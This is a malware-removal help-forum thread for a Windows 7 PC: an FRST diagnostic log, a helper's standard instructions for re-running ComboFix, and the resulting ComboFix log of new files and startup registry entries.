AlternateDataStreams: C:\ProgramData\TEMP:0B4227B4

AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2

 

==================== Safe Mode (whitelisted) ===================

 

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

 

 

==================== EXE Association (whitelisted) =============

 

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

 

 

==================== MSCONFIG/TASK MANAGER disabled items =========

 

(Currently there is no automatic fix for this section.)

 

 

==================== Faulty Device Manager Devices =============

 

Name: Microsoft 6to4 Adapter #2

Description: Microsoft 6to4 Adapter

Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}

Manufacturer: Microsoft

Service: tunnel

Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)

Resolution: Update the driver

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet 1022n

Description: HP LaserJet 1022n

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: Deskjet 6940 series

Description: Deskjet 6940 series

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: HP

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: hp LaserJet 2420

Description: hp LaserJet 2420

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: Deskjet 6980 series

Description: Deskjet 6980 series

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: HP

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: Deskjet 6980 series

Description: Deskjet 6980 series

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: HP

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet P2035n

Description: HP LaserJet P2035n

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet CP1025nw

Description: HP LaserJet CP1025nw

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP Color LaserJet CP2025dn

Description: HP Color LaserJet CP2025dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet Professional P1606dn

Description: HP LaserJet Professional P1606dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet P2035n

Description: HP LaserJet P2035n

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP LaserJet 200 color M251nw

Description: HP LaserJet 200 color M251nw

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

Name: HP Color LaserJet CP2025dn

Description: HP Color LaserJet CP2025dn

Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}

Manufacturer: Hewlett-Packard

Service: 

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

 

 

==================== Event log errors: =========================

 

Application errors:

==================

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\INDEX> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\DATA_3> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\DATA_2> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\DATA_1> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CURRENT SESSION> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\SHORTCUTS> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\SHORTCUTS-JOURNAL> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:27 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOGIN DATA> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:27 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOGIN DATA-JOURNAL> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:27 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\WEB DATA> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

 

System errors:

=============

Error: (08/25/2014 01:43:07 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 01:36:58 PM) (Source: VDS Dynamic Provider) (EventID: 10) (User: )

Description: The provider failed while storing notifications from the driver. The Virtual Disk Service should be restarted. hr=80042505

 

Error: (08/25/2014 01:20:43 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 01:08:55 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 00:58:18 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 00:14:03 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 00:04:56 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 11:55:18 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 11:45:56 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 11:26:20 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

 

Microsoft Office Sessions:

=========================

Error: (08/14/2012 04:50:33 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )

Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6600.1000, Microsoft Office Version: 12.0.6425.1000. This session lasted 228 seconds with 60 seconds of active time.  This session ended with a crash.

 

Error: (12/21/2010 06:24:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )

Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 61 seconds with 60 seconds of active time.  This session ended with a crash.

 

Error: (10/09/2010 05:15:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )

Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 19 seconds with 0 seconds of active time.  This session ended with a crash.

 

Error: (03/25/2010 00:21:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )

Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6504.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 60 seconds with 0 seconds of active time.  This session ended with a crash.

 

 

CodeIntegrity Errors:

===================================

  Date: 2014-08-25 13:41:40.016

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.905

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.794

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.682

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.419

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.308

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.196

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.070

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:27.280

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:27.171

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

 

 

==================== Memory info =========================== 

 

Processor: Intel® Core2 Duo CPU E4600 @ 2.40GHz

Percentage of memory in use: 49%

Total physical RAM: 3060.46 MB

Available physical RAM: 1540.3 MB

Total Pagefile: 6353.2 MB

Available Pagefile: 4717.66 MB

Total Virtual: 2047.88 MB

Available Virtual: 1907.04 MB

 

==================== Drives ================================

 

Drive c: (OS) (Fixed) (Total:450.71 GB) (Free:222.38 GB) NTFS ==>[Drive with boot components (obtained from BCD)]

Drive d: (RECOVERY) (Fixed) (Total:15 GB) (Free:10.55 GB) NTFS

Drive f: (CC) (Removable) (Total:1.92 GB) (Free:1.88 GB) NTFS

 

==================== MBR & Partition Table ==================

 

========================================================

Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 10000000)

Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)

Partition 2: (Not Active) - (Size=15 GB) - (Type=07 NTFS)

Partition 3: (Active) - (Size=450.7 GB) - (Type=07 NTFS)

 

========================================================

Disk: 1 (Size: 1.9 GB) (Disk ID: E79A82AA)

Partition 1: (Active) - (Size=1.9 GB) - (Type=07 NTFS)

 

==================== End Of Log ============================



Looks like FRST did the work, but I'd like to run CF once more for a confirmation.

Delete your version of ComboFix and obtain a new one before running the scan.



Scan with ComboFix

This is a very powerful tool that should be used only if advised by a Malware Analyst.
Do not run ComboFix on your own!


Referring to this instruction, please download ComboFix by sUBs and save it to your desktop.
Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.
If you are a user of CD emulation software (like Daemon Tools or Alcohol) also disable it for the cleaning process - instructions here.

  • Right-click on the ComboFix icon and select Run as Administrator to start the tool.
  • Accept the disclaimer and agree if prompted to install Recovery Console.
  • Do not take any actions while ComboFix goes through your System - it may cause it to stall!
  • This scan may take some time!
  • When finished - it will display a logfile (located also on your main drive, usually C:\ComboFix.txt).

Include that log in your next reply.
If you encounter any issues with your internet connection after running ComboFix, please visit this link.
If an error about an operation on a key marked for deletion appears after running the tool, please reboot your machine.
Don't forget to re-enable your previously switched-off protection software!
 


Combofix log again. I don't see any mention of Poweliks.

 

ComboFix 14-08-24.01 - savas.kyriakidis 08/25/2014  14:11:56.5.2 - x86
Running from: F:\ComboFix.exe
.
.
(((((((((((((((((((((((((   Files Created from 2014-07-25 to 2014-08-25  )))))))))))))))))))))))))))))))
.
.
2014-08-25 18:21 . 2014-08-25 18:21 -------- d-----w- c:\users\Rita\AppData\Local\temp
2014-08-25 18:21 . 2014-08-25 18:21 -------- d-----w- c:\users\Guest\AppData\Local\temp
2014-08-25 18:21 . 2014-08-25 18:21 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-08-23 20:54 . 2014-08-25 17:46 -------- d-----w- C:\FRST
2014-08-23 20:30 . 2014-08-25 13:35 110296 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-08-23 20:30 . 2014-08-25 12:26 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-08-23 20:30 . 2014-05-12 11:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-08-23 20:30 . 2014-05-12 11:25 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-08-23 20:30 . 2014-05-12 11:25 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-08-23 20:16 . 2014-08-25 18:21 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\temp
2014-08-23 15:51 . 2014-08-23 15:53 -------- d-----w- C:\AdwCleaner
2014-08-23 15:42 . 2014-08-23 15:42 -------- d-----w- c:\windows\ERUNT
2014-08-22 21:06 . 2013-09-04 18:57 24040 ----a-w- c:\windows\system32\drivers\gfiutil.sys
2014-08-22 21:06 . 2013-05-23 12:39 43368 ----a-w- c:\windows\system32\drivers\gfiark.sys
2014-08-22 21:05 . 2014-08-23 01:40 -------- d-----w- C:\VIPRERESCUE
2014-08-22 21:05 . 2014-08-22 21:05 -------- d-----w- C:\EEK
2014-08-22 18:00 . 2014-08-23 20:48 -------- d-----w- c:\programdata\HitmanPro
2014-08-22 17:41 . 2014-08-22 17:41 -------- d-----w- c:\programdata\DameWare Development
2014-08-22 17:41 . 2014-08-22 17:54 -------- d-----w- c:\windows\dwrcs
2014-08-20 23:17 . 2014-08-20 23:17 319456 ----a-w- c:\windows\DIFxAPI.dll
2014-08-20 22:12 . 2014-08-19 22:12 75264 ----a-w- c:\windows\system32\drivers\dfsc.sys
2014-08-20 22:08 . 2014-08-20 22:08 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-20 03:07 . 2014-08-20 03:07 -------- d-----w- c:\programdata\GlarySoft
2014-08-16 21:57 . 2014-08-17 21:23 -------- d-----w- c:\programdata\AVG2014
2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 16:05 . 2014-08-16 16:05 -------- d-----w- c:\programdata\SlimWare Utilities Inc
2014-08-16 16:04 . 2014-08-16 16:04 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-16 00:57 . 2014-08-16 16:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-16 00:56 . 2014-08-16 13:22 -------- d-----w- c:\program files\DriverUpdate
2014-08-15 17:04 . 2014-08-15 17:21 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-14 22:20 . 2014-08-14 22:20 17216 ----a-w- c:\windows\system32\drivers\GUBootStartup.sys
2014-08-14 22:19 . 2014-08-04 07:06 101664 ----a-w- c:\windows\system32\BootDefrag.exe
2014-08-14 22:19 . 2014-07-18 07:11 16064 ----a-w- c:\windows\system32\drivers\BootDefragDriver.sys
2014-08-14 22:19 . 2014-08-23 15:16 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-14 22:19 . 2014-08-14 22:19 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 22:19 . 2014-08-25 14:49 -------- d-----w- c:\program files\Glary Utilities 5
2014-08-14 01:28 . 2014-08-14 01:28 -------- d-----w- c:\program files\iPod
2014-08-14 01:28 . 2014-08-14 01:31 -------- d-----w- c:\programdata\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-14 00:53 . 2014-08-14 00:53 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin5.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin4.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin3.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin2.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin.dll
2014-08-14 00:51 . 2014-08-14 00:52 -------- d-----w- c:\program files\QuickTime
2014-08-13 01:20 . 2014-08-13 01:20 -------- d-----w- c:\programdata\WindowsSearch
2014-08-12 22:03 . 2014-08-12 22:03 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 22:02 . 2014-08-22 20:10 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\42a495
2014-08-12 21:58 . 2014-08-15 07:47 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-12 20:53 . 2014-08-23 01:40 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-12 20:51 . 2014-08-25 13:16 -------- d-----w- c:\programdata\IrfuqApivh
2014-08-12 20:33 . 2014-08-12 20:37 20480 ----a-w- c:\program files\Internet Explorer\version1.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-06-17 20:17 . 2014-06-17 20:17 147736 ----a-w- c:\windows\system32\drivers\avgidshx.sys
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ehTray.exe"="c:\windows\ehome\ehTray.exe" [2008-01-21 125952]
"Akamai NetSession Interface"="c:\users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe" [2014-04-18 4672920]
"iCloudServices"="c:\program files\Common Files\Apple\Internet Services\iCloudServices.exe" [2013-10-31 59720]
"com.apple.dav.bookmarks.daemon"="c:\program files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe" [2013-10-02 59720]
"ApplePhotoStreams"="c:\program files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe" [2013-10-31 59720]
"GUDelayStartup"="c:\program files\Glary Utilities 5\StartupManager.exe" [2014-08-18 37152]
"UINoteworthy"="c:\users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll" [2014-08-20 325632]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ECenter"="c:\dell\E-Center\EULALauncher.exe" [2008-02-29 17920]
"RtHDVCpl"="RtHDVCpl.exe" [2008-03-06 4706304]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2006-11-10 90112]
"dscactivate"="c:\program files\Dell Support Center\gs_agent\custom\dsca.exe" [2008-03-11 16384]
"PCMService"="c:\program files\Dell\MediaDirect\PCMService.exe" [2008-01-14 132392]
"AppleSyncNotifier"="c:\program files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe" [2012-02-23 59240]
"HP Software Update"="c:\program files\HP\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]
"PMBVolumeWatcher"="c:\program files\Sony\PMB\PMBVolumeWatcher.exe" [2010-03-24 599328]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2011-06-15 997920]
"AVG_TRAY"="c:\program files\AVG\AVG10\avgtray.exe" [2011-09-10 2338656]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-07-31 43816]
"acevents"="c:\program files\ActivIdentity\ActivClient\acevents.exe" [2009-06-03 153640]
"accrdsub"="c:\program files\ActivIdentity\ActivClient\accrdsub.exe" [2009-06-03 400936]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2014-01-17 421888]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2014-08-01 152392]
"DameWare MRC Agent"="c:\windows\dwrcs\DWRCST.exe" [2012-11-02 379752]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"HideFastUserSwitching"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"UseDefaultTile"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ   autocheck autochk * \0BootDefrag.exe\0sasnative32
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37.sys]
@=""
.
S2 ac.sharedstore;ActivIdentity Shared Store Service;c:\program files\Common Files\ActivIdentity\ac.sharedstore.exe [2009-06-03 207400]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ   Pml Driver HPZ12 Net Driver HPZ12
HPService REG_MULTI_SZ   HPSLPSVC
